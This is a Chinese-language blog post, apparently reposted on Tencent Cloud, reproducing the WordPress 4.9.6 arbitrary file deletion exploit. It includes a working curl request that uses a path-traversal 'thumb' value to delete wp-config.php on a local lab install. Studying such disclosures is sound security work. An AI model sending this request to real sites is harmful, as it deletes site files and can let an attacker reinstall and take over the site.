前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress 4.9.6任意文件删除漏洞利用

WordPress 4.9.6任意文件删除漏洞利用

作者头像
C4rpeDime
发布2018-08-28 10:48:47
9910
发布2018-08-28 10:48:47
举报
文章被收录于专栏:黑白安全

WordPress是目前网络上最受欢迎的CMS。约有30%的网站都在使用它。这种广泛的采用,也使其成为了网络犯罪分子非常感兴趣的一个目标.RIPS团队在7个月前,向WordPress安全团队报告了这个漏洞,但至今发稿前依然没有得到修复。

受影响的版本

WordPress版本(包括当前的4.9.6版本)

比较鸡肋的是如果要利用该漏洞,攻击者需要作者权限登陆账号和删除媒体文件的权限。我根据谷歌搜索前三页WordPress站点,通过注册页面登陆发现权限很低;没有上传图片的权限。导致没有利用成功; 所以说WordPress安全团队迟迟没有修复漏洞,肯定认为这只是低危漏洞

利用

  1. 搭建环境
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第1张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第1张

WordPress 4.9.6

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第2张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第2张

安装成功后,在后台添加一个“作者”权限账户 “test” 只有写作功能,用于测试

2.添加媒体,上传一张图片

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第3张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第3张

3.在页面源码中找出 _wpnonce 值,通过页面源码查找 值为“5df9982e4e”

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第4张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第4张

4.发送请求

curl -v 'http://192.168.0.9/wordpress/wp-admin/post.php?post=9' -H 'Cookie: ****' -d 'action=editattachment&_wpnonce=5df9982e4e&thumb=../../../../wp-config.php'

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第5张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第5张

Cookie 可通过 burpsuite 截取

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第6张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第6张

发送命令之后回显成功,点击页面中的永久删除;再点击 burpsuite 中的 intercept is on 取消即可删除成功直接跳转安装页面

WordPress 4.9.6任意文件删除漏洞利用 安全测试 第7张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第7张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第8张
WordPress 4.9.6任意文件删除漏洞利用 安全测试 第8张

【完】 参考来源 http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/ https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

本文转载来自安全猎人/ScriptM转载

但是其实小编还是觉得吧!最近都用WordPress CMS操作系统了之前的织梦不知道还有没有人用呢,大家可以在下面评论出来哦!

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-07-055,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 受影响的版本
  • 利用
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档